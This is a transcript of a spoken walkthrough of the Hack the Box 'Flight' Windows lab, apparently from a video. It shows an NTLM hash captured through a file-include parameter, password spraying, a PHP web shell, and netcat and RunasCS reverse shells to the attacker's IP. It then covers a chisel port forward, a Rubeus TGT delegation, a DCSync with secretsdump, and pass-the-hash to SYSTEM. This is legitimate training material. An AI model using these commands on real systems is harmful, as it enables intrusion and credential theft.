What's going on YouTube? This is IPSec. I'm doing Flight from Hack the Box, and this was a hard Windows machine, but I don't think it was hard because it was super technical. It's just a lot of enumeration you have to do, and just knowing a lot of Windows basics or having a strong foundation there. It's got a web server that is running Apache and PHP, which is a little bit odd, but by the time you get a shell on it, you already went through like 2 or 3 different credentials, so you get a shell on the box from the web server. And the next step is you have to retry your old credentials that you got during your enumeration to switch users to get access to the second step. And that's not the most intuitive thing because on Windows, it's not as trivial as you'd expect to just switch users. If you're running a C2 or something like that, it's probably easy because you can use like a make token command. But if you're just doing reverse shell, you probably have to add a binary such as RunasCS.EXE and then do it that way. Then the privesc is just a TGT delegation attack, but we'll cross that bridge once we get there, so let's just jump in. As always, I'm going to start with an Nmap, so -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the Nmap directory and call it flight, and then the IP address of 10.10.11.187. This can take some time to run, so I've already ran it. Looking at the results, we have quite a few ports open. It looks like we have 12 ports because 988 are filtered, when there's only 1,000 scanned. So the very first one we see is DNS on port 53. It says simple DNS plus, so I'm assuming this is going to be an Active Directory server just because whenever I see that, I think that, and then if we skim down, we can confirm because Active Directory LDAP is listening. We have the hostname of flight.htb. But we also have HTTP open on port 80. It's running Apache HTTPD, Win64, so it is running on Windows, and we also have a PHP header in this in the server header. So it is a Windows server also running PHP, and the fact that it's Apache means it's not IIS, so it's a little bit weird to see this. Generally, I don't see Apache on Windows. Doesn't mean it doesn't happen, but 88, this is going to be Kerberos. It tells us the server time. We went over LDAP already. And then the last thing is there is a 7-hour clock skew. So if we're doing anything Kerberos related, we're going to have to fix our clock time because this is outside of the norm and Kerberos would fail. So we want to add flight.htb to our host file. So let's do sudo v etc host 10.10.11.187 flight.htb. And since this is a Windows box, I'm just going to run CrackMapExec against it because it will tell us the host name of this box. Right now we have the domain name, which is flight, and the host name is going to be G0. So we can do g0.flight.htb, and I'm also going to just do G0. Save it, and then let's go take a look at the website. So 10.10.11.187. We have, just looks like a flight booking thing. If I click anything here, nothing is happening when I go to this page. Like, if we could do round trip, put some information here, but there's 0 requests that go whenever I click something, even these links. We do have it leaking the host name of flight.htb down here. I'm going to try like index.php because we did have a PHP header on this. Even the error message is telling us PHP 8.11, but the page looks like it's index.html. So we could try GoBust to see if there's anything in this directory. We could also try like enumerating virtual host, and I'm going to do enumerating virtual host. So let's just do a fuff, and then let's do U for URL, HTTP 10.10.11.187 -8 for host header, host semicolon, or not semicolon, just a regular colon, fuzz.flight.htb. And then the word list, we're going to use opseclist, discovery, DNS, and we'll do subdomains, top million, 5,000.txt. Just going to run this, cancel it, and we can filter size for 7069 and see if anything comes back. We do have school, so I'm going to add school to our host file. So let's do school.flight.htb, and it is a domain controller, so I could also try like a zone transfer. So dig at 10.10.11.187. Is that the host name of this box? Etsy host. Yes, or not, the IP address of this box. AXFR flight.htb. and transfer failed. I think that's at least how we do a zone transfer with dig. Google, dig zone transfer. Let's just make sure I did the syntax correct. It's one of those things I don't do all the time, so I always forget. Dig axfr domain.com and then @ So the only thing it's having me do is put this at the end, which I don't think matters. So operation failed. We could do like ns lookup and then server 10.10.11.187. And instead of doing a zone transfer, we could poke around like this. If I did flight dot, what is this? School.flight.htb. The record's not in here. So we couldn't do just normal DNS because I guess DNS wasn't fully configured on this box. If I do flight.htb, we get an IP address of 192.168.22.180. I'm guessing that's just a red herring because Hack the Box supports DHCP, which you should never do on Active Directory servers or DNS servers. So the DNS record probably just didn't get updated here. So that's not an issue. Nothing really interesting with DNS. I would just try zone transfers and in real world, maybe run tools to brute force DNS as well as virtual host fuzzing. But let's get over to school.flight.htb. And we get this page. Looks like a lot of lorem ipsum. If we click around, we can see we have this view parameter at the top. And it's view about.html. And the page is index.php. If I do about.html, we need school.flight.htb. We do just get that about page, right? So we know in the root of this web server is about.html, and this view parameter is probably just loading it on the page. There's a very old way to do PHP where it's got a header and a footer, and then the view parameter just includes what's in the middle. So what I want to identify is if this is an LFI, a local file inclusion vulnerability, or just a file disclosure. The difference being the LFI vulnerability will execute code. The file disclosure vulnerability will just display the contents of the file. Easy way to verify that, let's just include itself, index.php. And if I go to the source, we can see what the PHP script is, right? I don't know where it ends. Oh, right here. So to make it easy, I'm just going to make dir source v index.php, and we can paste this, right? So we got the if statement. It's doing a URL decode to see if it begins with 2 periods, backslash, I think, or maybe this is 2 backslashes, if it has HT access, or if it has SHTML. And if it has any of those, it's going to block the activity. Otherwise, it's going to do a file get contents and display home.html, right? Now, one thing about Windows is if you make it connect over SMB, it will attempt an authentication, right? So I'm going to run responder. So I'm going to go opt responder sudo python 3.8, then responder.py. I probably need a -i ton 0. Actually, before we do this, I'm just going to do netcat lvnp 443. Sudo, and it's 445, not 443. And let's make a request to our server via SMB, right? So let's do proxy for this page, go to the repeater tab. And if I say the view is 10.10.14.8, the file share, we can just do please, and the file name will be subscribe. Doesn't actually have to exist. We just have to have, I think, both this and this. I've always seen it be flaky if you just do the LFI, or I guess this is remote file inclusion, and just leave it at the directory. Sometimes it doesn't like it, but it always likes it if you attempt to file as well. And running it, we get suspicious activity blocked, again, because we can't have 2 backslashes. We could do forward slashes though, and Windows supports that just happily. So we do this, the page hangs. If we go here, we see it attempting to make an SMB connection, right? So now this is where we run responder. And when it attempts to make that SMB connection, it's now going to respond to it. It's going to give us a hash back of whatever user it's running as, and then we can try cracking that hash. So let's add this. Let's see. Please subscribe. I had some spaces here. I screwed up the request. Okay. Run it, and we didn't get anything. What are you telling me? Nothing? Maybe let's give it a different file. Did it have something cached? Yep, maybe it had the file cached or something. Changing the file name fixed it, and we have an NTLM hash right here. So let's copy this. Let's go over to our cracking box, and then go into hashcat and VHOST flight.NTLMv2. Paste this, and then /hashcat hashes flight, and then opt word list rocku.txt. And if you don't have a separate box for cracking, just do it on your host. Don't do it in a VM, because if you do it in a VM, it's going to be slow, right? I always SSH off my box because I also record, and it could slow down my computer if I try to do both. But we do have a credential right here. This is going to be, I don't know what this says, Sassy Katie or something, but we got a credential to the box. So let's try. So let's do CME, SMB, 10.10.11.187. And then we need the username. I don't know that exactly, but let's put the password in, and we can go back to either our cracking attempt and see the username of SVC Apache because it was part of this hash, or we could go back to responder and get it. And let's say you clear the screen and didn't have that and didn't make notes. Responder does have this responder.db file. So if we do SQLite and then responder.db.dump, we could see it here as well, right? We have flight /SVC Apache, and also, I don't know, I guess it's the hash twice or something, but we have SVC _ Apache. I could read this to get the descriptions of what everything is. User, clear text, hash, full hash. So it stores both the regular hash and the full hash. I don't know why it stores them both, but it does. So let's put the user and see what we have. It is authenticated. It doesn't say pwn, so we can't just immediately log on to the box. We could check other things like WinRM and see if this allows us to log in. We can't. So let's try -- shares and see if we have any shares available to us. It is thinking still, and we have read access to a lot of shares. So we have read access to web, users. These are going to be, well, shared is also a unique share. So shared, users, and web are the things I'm interested in, just because those are going to be the non-default shares, right? So I'm just going to try SMB client -u SVC Apache -p. I don't know if I do -p. Let's do 10.10.11.187 / shared. I did not have the password saved. Try this again. Paste it in. Do a dir. And there's nothing in this directory. We could try users and see what's here. And we could also use like the Spider Plus module of CrackMapExec and do it this way and get all the files. But the very first thing I like doing is just SMB client to see what we have, right? SVC Apache has some files, maybe CD desktop. let's try web as well. So web's probably going to be the 2 websites. And the main thing I'm looking for here is any config file that we missed. Don't have anything there. School.flight.htb. Index. There's an lfi.html. What is this? Let's check this out. School.flight lfi.html. We are intercepting, so let's turn that off. And enter. Oh, the LFI prevented. Okay. So nothing really interesting in these shares. We could run the spider plus, I think, let's see, -m spider underscore plus. Is that how we do it? We need, whoops, shoot. I should just let that run. Let's see what happens. I think I have to specify a directory name, right? Yeah, because it's doing like the print directory. So is there a -h? Let's see, share. Is it spider? Spider users, right? That was the directory. Let's go back up. Where is it? Shared users. Yep. So it still says directory print. I'm going to let this finish and let's see what's in this spider plus output. Okay, now that this has finished, let's take a look at the results. So I'm going to cat the file. There we go. It's temp scme spider plus and then the ip.json. And it looks like it may have done every share. So I'm not sure how to make it targeted at one share, but we got the information we need. As always, this is very, very verbose, right? If we do jq dot, we have like the file time, creation time of everything. The one thing I like doing is just seeing a list of all the files. So I'm going to do a single quote and then a period and pipe that over to keys. Oh, this only shows the shares, right? So if I do map values of the keys, so let's go back up real quick because this probably isn't going to be intuitive, like anything the JQ. So this is going to be the key, I guess, right? So this is what we displayed first, and we just want to get the value. We don't want to get all, I don't know what this is called, sub values, all the details of this. So we only want to get each of these from the shares. So that's why I did map values of the keys. And now we have a list of all the files, but this doesn't get us anything. We could put this over to a file, sort it, do other things, but this ends up being a dead end of exploiting the file share. Interesting, but I don't think there's anything there. So the other thing we could do with CrackMapExec, instead of dumping all the shares, we can do -- users to dump a list of all the users on the box. So let's see if this works. If it does, I'm going to output it over to a file. I'm going to call this users.txt. And we're going to do a password spray after this to identify if there's any other users with this credential, right? Because we're on a service account. Chances are whoever set up the service account may have used their personal password to put on the service account. Sounds really stupid, I know, but it does happen. We also see the bad password count for all these users. But yeah, so if I cat users.txt, we have it. I'm going to do a awk to separate it. Print, I think it's 5, right? If you don't know why I'm saying 5, this is a starter line. So 1, 2, 3, 4, 5. Yep, it is the 5th field. So now I'm just going to grep for flight, and then I'm going to direct it to you and then rename you with users.txt. So now users.txt is a list of all the users. I'm going to use CrackMapExec and specify users.txt and see if we get any hits. So it's going to attempt, login failure, and we got a success, and it stopped on Apache. So I'm going to do the continue on success flag of CrackMapExec because I don't want it to stop. I want it to keep going. We could have also just deleted this user and had it go, but this is the quicker way, right? And you could use other tools like kerberos to do it as well, but since we're already in CrackMapExec, might as well use CrackMapExec to its fullest. So we have the S.Moon account. So let's do the shares again. So let's do, where's shares? Come on. We can do -- shares and change this user to s.moon. And we probably should have a creds file, right? So while that runs, vcreds.txt, svc apache, s.moon. Okay. And it's pretty much the same as with svc apache, but we have read-write over shared. So let's do SMB client -u s.moon and then 10.10.11.187 shared. Put in the credential, login failure. What? Wrong clipboard. Control-Shift insert. And we have write access to this. It's literally just a share though. So I'm thinking we have to put a poisoned file up on the share in order to get a new hash, right? And I could pretend that I know how to do all this just off the top of my head, especially because if you went to like ipsec.rocks, we've done similar attacks, believe it or not. If you just search ipsec.rocks for SCF files, we go over how to create this manually. But the easiest way is just to use a package called NTLM theft from GitHub. So if we look at NTLM theft and just clone it, so git clone NTLM theft, it's going to generate everything for us. It'll generate URLs, LNKs, which are shortcuts, SCF files, and it tells us it's not working on the latest version of Windows. But keep in mind, these boxes are relatively old. I think SCF was patched somewhat recently. For the URL, they're actually going to have to click on it. But like SCF files, this tells the icon file it's hosted on a remote server. So if they just open it in File Explorer, it will load. So that's the cool thing about those files. So let's run this program. NTLM theft. What are the syntax? I think we just copy it. We need -g to generate. So -g all, S for server, F for file name. So G all, S 10.10.14.8, and then the file name I'm going to call please subscribe. I didn't do a -f. There we go. So now it created the folder please subscribe and put all those files in it. So I'm going to move please subscribe up one directory, and then I'm also going to go to it from my SMB client. So let's go into please subscribe. And there is a command, maybe it's LCD for local change directory, but I always find it easier just to disconnect and reconnect. So the next thing we want to do is set up responder. So sudo, I have it in opt responder, python 3.8, responder.py, i ton0. And let's put these files one at a time. I'm going to try the SCF file first because this is the one I've done most often, and we get access denied. I'm going to try Desktop.ini. It looks like it put it there, and I'm also going to set a sleep for 2 minutes. And if I don't get a hit within 2 minutes, then I'm going to try the next file. I'm doing it one at a time instead of scripting them all, because if I want to create a pen test report, I can't just say we uploaded a file and got a hash. We have to say exactly what happened, right? So that's why we did that. And we got the hash. If you're curious what Desktop.ini looks like, we can cat the file real quick. And you can see it's just loading an icon off of our server, right? So because we have this hash, we can now copy this, go back to the Kraken, add the file in, so v hashcat hashes flight NTLMv2, add this hash, and then we want to crack it, so hashcat, hashes flight, and then we'll use rocku.txt and see if we get another hash with this account. And it looks like we do, because we got recovered 2 out of 2, and we see C.Bum's password is ticky-call and a long string of numbers. So let's run CrackMapExec. Actually, before we do, let's go to creds, add C.Bum, which is a hilarious username. CME SMB -u C.Bum -p, put in this password, and then we're going to add shares. See what this user has access to. And of course, we forgot the IP address or host name. We could put either one there, right? So it's attempting. It's now going to dump the shares. And let's see what we have access to. We have read-write over the web directory. So since the web server is running PHP, we can just drop a PHP script and execute it in the web, right? So let's do SMB client -u C.Bum 10.10.11.187/web. Paste in the password. I had it on the wrong clipboard. CD web. Actually, we're in web. We want to go to like flight.htb. And then all we have to do is create a script for a reverse shell, right? So I'm going to make dir dub. And we can do shell.php. And then system request cmd, like this. And we can put shell.php on this. Let's see, lcd dub. Does this work? Now put. Oh, I did it. I was in the *HTB flight directory, and the lcd changed my local working directory to dub, so I could put the shell.php easily. Let's do shell.php. We can do $cmd equals who am I? And it did not execute. That's weird. Let's try it on school. So cd school.flight. Actually, I did not put that in. Let's do the full PHP tag. Put shell.php. Okay, so that was it. Let's see. I screwed up the request. It's not rec. It is request. Put run. And now we have code execution as flight and then service Apache user. So we want to get a reverse shell. We don't have a bash one-liner we can just use. I'm going to download netcat64 for Windows. So NC64 Windows. I'm going to go to eternally bored and download it from here. So if I click netcat112 and then save file, we can move downloads here and unzip it. And then we can put nc64.exe. And now we can nclvnp 9001. And in a URL, I'll type it here so we have a bigger font. We're going to execute the command nc64.exe -e PowerShell.exe 10.10.14.8 9001. So that's the command I'm going to execute. So it sends ourselves a reverse shell that is running PowerShell. Already in use. Okay, I did listen there. So go back here, cmd. Let's put that in. And we got not found. So it looks like a cleanup script deleted our files. Let's just put them back there. Refresh. And we have a reverse shell. If I do whoami/all, we don't have the SE impersonate privilege. It's the first thing I always check whenever I pop a web server on Windows. Because if we do, then a potato-style attack would work. But we do have flight service Apache. I don't have the clear line, and I can't do up-down. So I'm going to kill my shell and execute it with rl wrap. And now I have up, down, and the normal things I would expect. So I'm not too interested in the flight directory or anything else just because we've already explored this with the FTP, right? There's no interesting files in here. We could go into /, and one of the things I noticed that stands out is there's also inetpub. And if we looked at netstat, I think it's just AN. Oh God, that's a lot of ports. I forgot this is a domain controller. Let's see. Can I look at TCP? Here we go. We do see there are some ports that we did miss. We do have WinRM, but we also have port 8000 listening. And our Nmap, if we do nc-zv 10.10.11.187, port 8000, it doesn't find it, right? The firewall must be blocking this. We could, again, look at our Nmap. It's not even saying it's filtered or anything like that. So there is something listening on port 8000. And since inetpub is also here, I'm guessing IIS is installed. So if I curl localhost 8000, let's see, maybe we have to do HTTP. We get a 400 error saying the host name is invalid, but we still got to a web server on this, right? Let's see, is there a -v? I was trying to figure out how to see headers, but curl on Windows is just an alias. Is it alias if I do curl? It's really just doing invoke web request, right? So it's not a real curl. I don't know exactly how to use it. I just mainly use it for GET request. But the whole purpose is we want to go in inetpub and see what's here. There is a development directory. There's also root. If I go in root, let's see, can we write any file here? Echo test to test.htm? We can't. Access is denied. There was a development directory, so let's try echoing test into test, and access is denied. Let's do an iCackles. So iCackles on development. We can see C.Bum can write to this directory. Now the issue is we're not C.Bum. We're Service Apache. That being said, we do have C.Bum's credentials. Now, the regular run as is a very picky thing to getting a password into it. Like I can't just do run as /user C.Bum because it's going to want a TTY. Let's just try this. C.Bum, CMD, enter the password, and it hangs. I don't know exactly how to pipe the password in here. Everything I try to attempt fails because I don't have a proper TTY. This is where on Linux, we normally run like Python import PTY, but Python isn't installed on this Windows box. So there is another program. It's called RunasCS, which is just a run as C#, like run as command, but it's C#, so it's a .NET program. And this will allow us to pipe in a password. So it's going to do the same thing. If we just used a proper CT, we could probably just do like make token or something. It's just going to call create process and run it, right? So let's put this file on the server. I'm just going to go into program data and we can curl 10.10.14.8. It probably wants HTTP actually. 8000. And what is this going to be called? It is runascs.zip. So let's go www, and let's see, move, downloads, that's not it, capital R, unzip, okay. I'm just going to try the first one, like this. We didn't start a web server, that would help. We have downloaded it. If I do a dir, we can access it. Not enough parameters, which is a good thing. I was just making sure we didn't get like a .NET error, right? So I'm also going to curl 10.10.14.8, 8000 nc64.exe. We have to do HTTP probably. I did a backslash. There we go. So now we got netcat and RunasCS. So it wants username, password, and command. So let's try /runascs.exe, C.Bum, the password of C.Bum, which is going to be tikikal, and then the command. So I wonder if CMD, if I can just do multiple things. Based upon, this, it looks like I can. Where it's doing cmd.exe.r. Wait, does this have a default? Oh, sweet. It can redirect already. So we didn't need netcat. Let's try this. Let's just do this PowerShell.exe-r. And then it was IP port 10.10.14.8, 9001. NCLVNP 9001. Run it. And we get a PowerShell. So sweet. Now we are, well, I should not have done that dir command. It's listing every file in C:\Windows System 32. But now we can go to inetpub, cd development, and echo test to test. And we can write into this development directory. So now we can put a reverse shell. And since this is IIS, it's not going to be PHP, probably going to be an ASPX shell, right? So let us go back dub, and I'm going to get a ASPX reverse shell. So I'm just going to Google ASPX reverse shell. I think this is the one I would normally use. You could also use like lawn nums scripts and stuff. If we do locate, maybe shell.aspx is a good name. Like, let's see, user share lawn num ASPX shell. Like this is another one. So if my reverse shell doesn't work, this is the one I'd probably fall back to. But let's just try a reverse shell first. So v rev.aspx, paste this in. Was that the whole thing? Looks like it is. We probably want to change the IP address, of course. So instead of 127.0.0.1, 10.10.14.8, and 9001. Okay, so let's do curl http 10.10.14.8 8000 rev.aspx rev.aspx. So if we can execute this shell, let's see, we have to start the web server. Then we can switch to the user IIS is running as. And typically when you get that shell, you can do some type of privesc. Let's see. Copy, paste. There we go. So if I just do curl http localhost 8000 rev.aspx. Let's see. Host name is invalid. So I'm guessing the host name is going to be like development. Let's see. Ping development. Does this ping or not? I'm trying to avoid having to put on chisel. I wanted to take a shortcut and just hit this with curl, but it looks like I may not be able to do that. Okay, there we go. It just took a while for that to come back. Let's see. If I go ... is there like a config? If I go in logs, we can't access logs. Let's see. Get alias curl. That's not the right command. Get alias curl. So invoke web request. Web request, specify header. So let's see how we add a header with this. Is there an example? It was dash headers. So we add headers like this. So let's do curl dash headers. And then at like this. Host equals development.flight.htb is what I'm going to guess. And then HTTP localhost 8000 / rev.aspx. Let's see. I wonder if I did not set that right. Headers is equal to, we'll do it this way. Whoops. Paste. And if this doesn't work, I'm going to put it on, like, just run chisel and go the easy way, right? Copy, paste. Okay, so let's get chisel in this box. Chisel, GitHub. Releases. And we're going to want both Windows, AMD64, and Linux. Because we got to run the server on a Linux host, and we need to run the client on this Windows guy. So move, downloads, chisel, then that's just gzip, so gzip-d, chisel, and move chisel Windows to chisel W. Start the the HTTP server, program data, and then we can curl 10.10.14.8, 8000. We have to do HTTP 10.10.14.8, 8000, chisel W to chisel.exe. Waiting for it to finish downloading. This is a somewhat big binary, so it doesn't happen instantly. Hopefully it's downloading, I should say. Yep, it is. So now we can go here, chmod plus x, chisel like this. Put it in server, port, we'll do 8001. /chisel.exe, client 10.10.14.8, 8001. And let's see, we probably want local, let's see, is it 8000, 127.0.0.1? We'll go 8002. Does connect. It did not connect. I wonder if I can get my shell again. Nope. There we go. I probably reverse this. Let's see. I'm going to add the -- reverse flag. We'll do reverse. We listen on 8002 on our box and forward it to 127.0.0.1 port 8000. Okay. Curl localhost 8002. And we get a page. I'm surprised with the curl on Windows that did not work. So what we're doing with this chisel command, we set the server here and we set it in reverse mode. We run chisel, put this in client. This is the connection to our chisel box. And then we want to do a reverse port forward. So that's going to mean we open a port on the chisel server and forward everything on that port through the chisel connection out here. So on our box, we opened up port 8002. I didn't do 8000 because that's the port I keep using for Python SMTP server, or not SMTP, HTTP server. So we didn't want to reuse that port, so that's why I did 8002. And then everything I connect to on 8002 goes through chisel and hits 127.0.0.1 port 8000. So now if I listen on 9001, let's see. We're getting so many shells in this tmux. Let's just curl localhost 8002 rev.aspx. We didn't get what we expected, but that's fine. We definitely got a server error. So it did not like our reverse shell, it looks like. I'm not sure why, but let's just try a different reverse shell. So who am I here? This is SVC Apache. Shoot. We have to get our C.Bum credential again. And I'm going to get 2 shells as him. Okay. And the reason why I got 2 is so one I can do the chisel with, and the other I can drop files. So let's copy our chisel command. Okay, we're connected again. And here we can go inetpub development. Locate shell.aspx. Let's try the law num. Curl HTTP 10.10.14.8 8000 shell ASPX-O shell.aspx. Python 3 HTTP server. Download the shell. Curl localhost 8002 shell.aspx. Oh, this is not a reverse shell, so we should do it in a browser. If we do who am I, we are IIS DefaultAppPool. So now we have a reverse shell here. Let's see, we can probably do C:\program data nc64.exe-e PowerShell 10.10.14.8 9001. Let's just do this in a new pane. Hit enter. Who am I /all. And we have the SE impersonate privilege, and also we are the default app pool. And I'm always forget this when I do Windows. Let's just do RL wrap so we can clear the screen, right? There we go. And the interesting thing about this account is it's a system account. And we know that because it's not the domain before a username. We get this IIS app pool, which is weird. I want to say normally it's like NT Authority local system or whatever, but this is still a system account. We can validate that by running responder again. So let's go opt responder, Python 3, 8, responder.py, i:0, do a sudo. I think there's another responder server running. Let's see. Which pane are you? Not that pane. Here we go. I could have just used that pane, I guess, but we'll restart it. So if I try to access a file, so 10.10.14.8/ip/sec, we see it's attempting to download or attempting the hash G0$, which is the system account for this machine. So we can abuse this by using TGT delegation to get a ticket for this system account. And with that ticket, then we can secret stump the domain or DCSync. So to do that, we need to use Rubeus. So I'm going to pull it from my box. And there's this library called Sharp Collection that just has a bunch of .NET applications pre-built for you. So I'm going to copy Rubeus from here. So let's go HTB, flight, dub, and copy Rubeus. And we'll start our HTTP server. Okay. And let's go into program data and then curl HTTP 10.10.14.8, 8000, Rubeus.exe, out file Rubeus.exe. And we have now downloaded it. So let's just make sure we can run it to make sure the .NET version matches. Looks like it does. It didn't error at least. So let's do Rubeus TGT deleg for delegation, no wrap. And we get the ticket right here. So let's go and create this. So I'm going to call it ticket.kirby, paste it in, and then we want to convert it to a CC cache. So we can do the convert this way. Let's see. It did not like something. Let's try copying it again. I wonder if I need to unbase64 it actually. Let's see, move ticket Kirby .b64, then cat ticket Kirby base64, base64-d, ticket Kirby. And I know I did not need to do that cat. So now let's run this Kirby to CC cache again. This looks better. Info is done. So now we should have a ticket.ccache. I'm guessing this is fine. We do see G0, flight.htb, KRB TGT. So this is looking somewhat good, or at least promising. So let's export KRB5 CC name is equal to ticket.ccache. And now let's run secrets dump. So secrets dump.py -k. I think it's just one dash for no pass. No, it's two, I think. -- no pass. And then we'll specify the domain name and see what happens. Let's see. Nope, I think it's just one dash. Okay. It says try -just DC user. So let's try this. Maybe to give it a username. Let's see. Not sure exactly what it's complaining about here. We did just DC user. Is it at the wrong spot? Does it want it here? Administrator. I was expecting it to say something about my clock being wrong, because I can't use this kerberos ticket, because if we went back to our Nmap, we do flight.nmap, the clock skew is 7 hours, right? So we want to fix that. And to fix that, we can do a sudo ntp date -s flight.htb. And this is probably going to kill my VPN connection. Actually, I'm going to do it on the same pane as my VPN connection. So we can see if it dies or anything. I should have... Okay, we can see I went back many hours. Or is that forward? I went forward many hours. It's now Thursday. So that is set. Let's go back to our command and run it. We can get rid of administrator and see if it magically works. It did not. Let's see. We got no pass there. I'm going to guess this is my error, the LDAP filter thing, and my in-packet is probably screwed up. I do have an in-packet secrets dump. We can try that one. In-packet -secrets dump. I don't think we do .py with that. Does this still say the same thing? This is better. So my local version of Impacket is screwed up, but it worked with the one installed by, I'm guessing that's apt, right? And we have the administrative user here and a hash. So we could validate this with CrackMapExec, right? So CME SMB 10.10.11.187-U administrator -p, and it's not -p, it's -H for hashes. And let's see if this works. And we have it say pwned. So now we can do a psexec.py administrator at 10.10.11.187-hashes, like that. Requesting shares, writing it. And if I do a who am I now, we have NT authority system, so users, administrator, desktop, and we can get the flag, right? So root.text, and we catted it. So that's going to be the video. I do want to see if I can fix this Impacket real quick. Just what happens if I go to Impacket, git pull, pip3-m install like this. Let's see, actually Python 3 dot, let's just do Python 3-m pip install. It's processing. It did a lot of errors. So I probably should just rebuild my box to fix this. I'm not going to do that in this video. Maybe in a future video, we'll rebuild and set up a box from scratch. So that's going to be it. Hope you guys enjoyed it. Take care, and we'll see you all next week.